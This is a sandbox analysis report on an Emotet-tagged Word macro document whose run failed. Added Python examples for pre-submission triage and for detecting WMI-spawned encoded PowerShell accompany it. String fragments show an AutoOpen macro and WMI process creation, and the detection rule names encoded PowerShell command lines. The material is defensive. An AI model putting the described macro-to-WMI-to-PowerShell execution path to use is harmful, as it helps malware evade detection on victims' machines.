Analysis

Category Package Started Completed Duration
FILE Emotet 2019-12-03 04:59:33 2019-12-03 04:59:51 18 seconds
  • Info: Analysis failed: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted. (The Emotet package launches the sample as an executable; this sample is an OLE2 Word document, see File Details, so the Windows loader refused it and nothing ran inside the guest. The MalScore, signature and network sections below therefore record the absence of an analysis, not the sample's behaviour. Resubmit with a Word/document package.)
2019-12-03 04:59:34,030 [root] INFO: Date set to: 12-03-19, time set to: 04:59:34, timeout set to: 200
2019-12-03 04:59:34,062 [root] DEBUG: Starting analyzer from: C:\alelevo
2019-12-03 04:59:34,062 [root] DEBUG: Storing results at: C:\xVPKBlAAUL
2019-12-03 04:59:34,062 [root] DEBUG: Pipe server name: \\.\PIPE\KqupvX
2019-12-03 04:59:34,062 [root] INFO: Analysis package "Emotet" has been specified.
2019-12-03 04:59:34,825 [root] DEBUG: Started auxiliary module Browser
2019-12-03 04:59:34,825 [root] DEBUG: Started auxiliary module Curtain
2019-12-03 04:59:34,825 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2019-12-03 04:59:35,839 [modules.auxiliary.digisig] DEBUG: File format not recognized.
2019-12-03 04:59:35,855 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2019-12-03 04:59:35,855 [root] DEBUG: Started auxiliary module DigiSig
2019-12-03 04:59:35,855 [root] DEBUG: Started auxiliary module Disguise
2019-12-03 04:59:35,855 [root] DEBUG: Started auxiliary module Human
2019-12-03 04:59:35,871 [root] DEBUG: Started auxiliary module Screenshots
2019-12-03 04:59:35,871 [root] DEBUG: Started auxiliary module Sysmon
2019-12-03 04:59:35,871 [root] DEBUG: Started auxiliary module Usage
2019-12-03 04:59:35,871 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Emotet
2019-12-03 04:59:35,871 [root] INFO: Analyzer: Package modules.packages.Emotet does not specify a DLL_64 option
2019-12-03 04:59:36,121 [lib.api.process] ERROR: Failed to execute process from path "C:\Users\user\AppData\Local\Temp\5t3ns91coF.exe" with arguments "None" (Error: This version of %1 is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need a x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher (ERROR_EXE_MACHINE_TYPE_MISMATCH))
2019-12-03 04:59:36,121 [root] ERROR: Traceback (most recent call last):
  File "C:\alelevo\analyzer.py", line 1332, in <module>
    success = analyzer.run()
  File "C:\alelevo\analyzer.py", line 1151, in run
    "error: {1}".format(package_name, e))
CuckooError: The package "modules.packages.Emotet" start function raised an error: Unable to execute the initial process, analysis aborted.
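The failed start above is a package-selection error: the sample is an OLE2 Word document but was queued under a package that launches it as an .exe. What follows is an added example, not CAPE's own code, of the pre-submission check that catches this: classify the container by its magic bytes rather than the submitted name, read the PE Machine field when the file really is a PE (the x86/x64 mismatch the error text mentions), and scan the raw bytes for the macro indicators that this report's Strings output shows. The package names `doc`, `exe` and `generic` are Cuckoo/CAPE package names; mapping every OLE2 or OOXML container to `doc` is an assumption noted in the code; the sample bytes are constructed from strings in this report, not the real file.

```python
"""Pre-submission triage for a sandbox queue (added example, not CAPE code).

Picks the analysis package from the container's magic bytes instead of the
submitted file name, and scans for the macro indicators this report shows.
"""
import re
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 Compound File (Word 97-2003 .doc, .xls, .ppt)
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docm/.xlsm) is a zip container
PE_MACHINE = {0x014C: "x86", 0x8664: "x64"}     # IMAGE_FILE_HEADER.Machine

# Indicators copied from the Strings section of this report.  "ell -e" is a
# fragment: consistent with "powershell -e", but the full string is not in the dump.
INDICATORS = {
    "autoopen_macro":       rb"AUTOOPEN|AutoOpen|Document_Open",
    "wmi_process_create":   rb"winmgmts:Win32_Process(?!Startup)",
    "wmi_process_startup":  rb"winmgmts:Win32_ProcessStartup",
    "forms_userform":       rb"Microsoft Forms 2\.0 Form",
    "encoded_cmd_fragment": rb"ell -e\b",
}


def container_type(data: bytes) -> str:
    """Classify by magic bytes; the submitted name (here a .exe) is untrusted."""
    if data.startswith(CFB_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(b"MZ") and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
    return "unknown"


def pe_machine(data: bytes) -> str:
    """Read IMAGE_FILE_HEADER.Machine so an x64 binary is not queued on a 32-bit guest."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    return PE_MACHINE.get(machine, "unknown(0x%04x)" % machine)


def suggested_package(data: bytes) -> str:
    """Map the container to a Cuckoo/CAPE package name.  Assumption: an OLE2 or
    OOXML container is a Word file; an .xls/.ppt CFB needs its own package, so
    confirm with TrID/file output as the File Details section does."""
    return {"ole2": "doc", "zip": "doc", "pe": "exe"}.get(container_type(data), "generic")


def find_indicators(data: bytes) -> dict:
    """Count each indicator in the raw bytes (no VBA decompression; fragments only)."""
    return {name: len(re.findall(pat, data))
            for name, pat in INDICATORS.items() if re.search(pat, data)}


def triage(data: bytes) -> dict:
    kind = container_type(data)
    result = {"container": kind,
              "package": suggested_package(data),
              "indicators": find_indicators(data)}
    if kind == "pe":
        result["arch"] = pe_machine(data)
    return result


# Constructed stand-in for the sample: a CFB header plus strings that appear in
# this report's Strings output.  Not the real file.
MALDOC_SAMPLE = CFB_MAGIC + b"\x00" * 24 + b"\x00".join([
    b'Attribute VB_Name = "zAQCox"',
    b"winmgmts:Win32_Processat",
    b"winmgmts:Win32_ProcessStartup",
    b"ell -e",
    b"Microsoft Forms 2.0 Form",
    b"PROJECT.ZAQCOX.AUTOOPEN",
    b"Word.Document.8",
]) + b"\x00"

# Constructed minimal x64 PE header: DOS header with e_lfanew = 0x40, then the
# NT signature and IMAGE_FILE_HEADER.Machine = 0x8664.
PE_X64_SAMPLE = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)
                 + b"PE\x00\x00" + struct.pack("<H", 0x8664) + b"\x00" * 18)

if __name__ == "__main__":
    for label, blob in (("maldoc", MALDOC_SAMPLE), ("pe", PE_X64_SAMPLE)):
        print(label, triage(blob))
```

Run it on the real file with `triage(open(path, "rb").read())` before queuing. The indicator scan deliberately works on raw bytes: the VBA module streams are LZ-compressed, so it only sees what survives uncompressed (names, type library paths, form properties), which is exactly what the Strings module on this page saw; for the macro body itself, decompress the streams with olevba.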

MalScore

0.0

Benign (no behaviour was scored because the sample never started in the guest; this is not a verdict on the document)

Machine

Name Label Manager Started On Shutdown On
target-02 target-02 ESX 2019-12-03 04:59:33 2019-12-03 04:59:50

File Details

File Name 45c5114e141a1a6387a538325f15a6e4139aeff1 (submitted name; it is not this file's SHA1, which is listed below)
File Size 181248 bytes
File Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 28 15:01:00 2019, Last Saved Time/Date: Thu Mar 28 15:01:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 8, Security: 0
MD5 3bc04edbff711559c02437ba22d050ec
SHA1 d20b256a6a19e410a16908e8febe08952798eee5
SHA256 ad5faaa82a6caef20722faf6fd1efd2d441b0e8362210d6e57af6ed666b62769
SHA512 b86aedf14b2a41b55f2cb5183b09fd91d96ddb457708a4eed98feb2bfc9368f259a1680dd7256b8739d064b2832383216b835e978dab01b6b1fcb3b7a9bc6185
CRC32 AA070E08
Ssdeep 3072:g77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qxTkKJLHwVEjx5g8:g77HUUUUUUUUUUUUUUUUUUUT52VWTkKN
TrID
  • 54.2% (.DOC) Microsoft Word document (32000/1/3)
  • 32.2% (.DOC) Microsoft Word document (old ver.) (19000/1/2)
  • 13.5% (.) Generic OLE2 / Multistream Compound File (8000/1)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

No signatures


Screenshots


Hosts

No hosts contacted.

DNS

No domains contacted.


Summary

No static analysis available.
Strings (output of the Strings processing module; the VBA module streams are LZ-compressed, so most macro text survives only as short fragments, listed here grouped rather than in dump order)

Macro indicators
  • PROJECT.ZAQCOX.AUTOOPEN (AutoOpen entry point in module zAQCox: runs when the document is opened and macros are enabled)
  • winmgmts:Win32_Process (dumped as "winmgmts:Win32_Processat") and winmgmts:Win32_ProcessStartup (WMI process creation; a process created this way is parented by WmiPrvSE.exe rather than WINWORD.EXE)
  • ell -e (fragment; consistent with an encoded PowerShell command line, but the full string is not recoverable from this dump)
  • GetObje, pCall, Password, nction p, If, Th, The (fragments of GetObject / Call / Function / If ... Then)
  • * CDbl(4, .377@589016, Log(1248, * CDbl(3 (arithmetic used to obfuscate values)
  • Microsoft Forms 2.0 Form / Embedded Object (twice), ControlTipText (two embedded UserForms, matching the VBFrame streams for VAGDDBD and lAAAAZA below)

VBA project attributes and identifiers
  • Attribute VB_Name = "PAQ..., Attribute VB_Name = "lA..., Attribute VB_Name = "zAQ... (truncated module names; full names appear as stream names below)
  • Pre decla / PredeHcla, rmal.Thi, 0Templ, *\CNormalrU (fragments of VB_PredeclaredId and Normal.ThisDocument)
  • VB_Base GUID fragments: 0{AE8C0625-BA...-42CE...C-9F4C17...1B2BCA}{D26F1D8D-9AA5-4A15-9003-... and 0{8D58927F-6E28-498F-A9C5-E75B992FA05B}{48D459E1-34DE-4D74-AAF...
  • _B_var_fB_Akx<, _B_var_BwAUcU, _B_var_u_wBCB, _B_var_wXAkAUXk7, _B_var_KADQZC
  • Document=PAQ_UUkB/&P, BPAQ_UUkB, AlAAAAZA, DVAGDDBD, xzAQCox

Type library references (the same paths also occur as 8-byte fragments, omitted here)
  • *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
  • *\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
  • *\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation
  • *\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
  • *\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
  • *\G{71B8D0D7-CFF9-4CBC-9DED-F13C852D434A}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
  The MSForms.exd path shows the project was built under an Administrator profile on an Office 16 install; this is build-environment information, not something the document needs at run time.

OLE2 storages and streams
  • Root Entry, 1Table, WordDocument, SummaryInformation, DocumentSummaryInformation, CompObj
  • Macros, PROJECT, PROJECTwm, _VBA_PROJECT, __SRP_0, __SRP_1, __SRP_2, __SRP_3
  • Module and form streams: PAQ_UUkB, zAQCox, VAGDDBD, lAAAAZA (VAGDDBD and lAAAAZA each carry a CompObj and a VBFrame stream)

Document metadata
  • Microsoft Word 97-2003 Document, MSWordDoc, Word.Document.8, Normal.dotm, Microsoft Office Word, Title, Picture 1, 7Exif
  • Styles: Normal, Default Paragraph Font, Table Normal, No List, Balloon Text, Balloon Text Char
  • Fonts: Tahoma (many occurrences, including "TahomaAA"), Times New Roman, Symbol, Arial, Calibri, Calibri Light, Cambria Math
  • DrawingML theme fragment: <a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>

Other fragments (random-looking VBA identifiers and chunks of the compressed module streams, kept for completeness)
  • lAA_AGQ1AAAZqAcAxXA, 3\A.-, hk@kZ, ofGGw, 0125774, AGDDBD.`H GG1.T, `704352, oZ%"$, m@BQBAAo, ZkCAU, 4BUBc_ /, kAA) -, WZUAoCA, CoAAG /, 8 XoD_, GUG = QA, ZAAX, 2ZUU_xQ, bAABoB, x.wcA@D, cGADAQAA>, acoAXA, fG__QU!, ADUoAAZcZ, nkDccXwA, nw_UoA1U, tQBBAD4B, qBXABZA, cccAwD, Yw_1BAB#, zZZkk_BH, zAAGGX1X, wcAUBA, s1AUCAD, ZBAAQDD, LAAAx4D, pUQ_AQA, SAAAXAAA, lXc4cAAA, EAAGG1AA, EAAGG1, EDQxxQGA

This file is not on VirusTotal.
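The strings above show the macro's execution path even though the sandbox recorded nothing: an AutoOpen entry point and WMI (winmgmts:Win32_Process) process creation. A process created through WMI is parented by WmiPrvSE.exe, not by WINWORD.EXE, which is why a plain "Office spawns a shell" rule misses it. The following is an added example, not CAPE's own code and not a signature from this report, of a host-side rule over Sysmon Event ID 1 (process create) records: flag PowerShell whose parent is WmiPrvSE.exe, decode an -EncodedCommand argument when one is present, and weight the hit when an Office process started earlier on the same host. The events, hostnames, PIDs and the encoded payload are all constructed.

```python
"""Detecting the WMI-spawned PowerShell that a winmgmts:Win32_Process macro
produces (added example, not CAPE code; sample events are constructed).

Sysmon Event ID 1 records are reduced to the fields the rule needs.
"""
import base64
import re

OFFICE = ("\\winword.exe", "\\excel.exe", "\\powerpnt.exe")
SHELLS = ("\\powershell.exe", "\\pwsh.exe")
# -e, -ec, -en, -enc ... are accepted prefixes of -EncodedCommand; the
# argument is base64 of the UTF-16LE script text.
ENC_FLAG = re.compile(r"(?i)(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    return raw.decode("utf-16-le", errors="replace")


def detect(events):
    """Flag PowerShell parented by WmiPrvSE.exe.  Score 1 for the parent alone,
    +1 if the command line is encoded, +1 if Office started earlier on the host."""
    office_hosts = set()
    hits = []
    for ev in events:  # assumed to be in time order
        image = ev["Image"].lower()
        parent = ev["ParentImage"].lower()
        if image.endswith(OFFICE):
            office_hosts.add(ev["host"])
            continue
        if not (parent.endswith("\\wmiprvse.exe") and image.endswith(SHELLS)):
            continue
        decoded = decode_encoded_command(ev["CommandLine"])
        score = 1 + (decoded is not None) + (ev["host"] in office_hosts)
        hits.append({"host": ev["host"], "pid": ev["ProcessId"],
                     "score": score, "decoded": decoded})
    return hits


# Constructed payload and events; none of this comes from the analysis above.
PAYLOAD = "Start-Sleep 1; Write-Output 'constructed test payload'"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"host": "ws01", "ProcessId": 4120,
     "Image": r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n invoice.doc'},
    {"host": "ws01", "ProcessId": 5312,   # macro -> WMI -> PowerShell: parent is WmiPrvSE
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -e " + ENCODED},
    {"host": "ws02", "ProcessId": 777,    # encoded but launched from cmd: out of scope here
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -e " + ENCODED},
    {"host": "ws03", "ProcessId": 902,    # WMI-launched admin script, no Office, not encoded
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The low-score case (ws03) is what legitimate management tooling looks like, so the score is there to rank rather than to suppress: a WmiPrvSE.exe parent plus an encoded command line on a host where Word just opened a document is the shape of this maldoc, and the decoded script is what you hand to the responder.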

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.


Processing ( 1.339 seconds )

  • 1.012 Strings
  • 0.097 TrID
  • 0.095 CAPE
  • 0.086 TargetInfo
  • 0.036 Deduplicate
  • 0.007 NetworkAnalysis
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.069 seconds )

  • 0.012 antiav_detectreg
  • 0.008 ransomware_files
  • 0.005 persistence_autorun
  • 0.005 antiav_detectfile
  • 0.003 browser_security
  • 0.003 infostealer_ftp
  • 0.003 ransomware_extensions
  • 0.002 tinba_behavior
  • 0.002 rat_nanocore
  • 0.002 cerber_behavior
  • 0.002 antianalysis_detectfile
  • 0.002 antianalysis_detectreg
  • 0.002 antivm_vbox_files
  • 0.002 geodo_banking_trojan
  • 0.002 infostealer_bitcoin
  • 0.002 infostealer_im
  • 0.001 betabot_behavior
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 modify_proxy
  • 0.001 disables_browser_warn
  • 0.001 infostealer_mail
  • 0.001 masquerade_process_name

Reporting ( 0.0 seconds )

Task ID 115333
Mongo ID 5de5ebcb38b1e1182f3b07c8
Cuckoo release 1.3-CAPE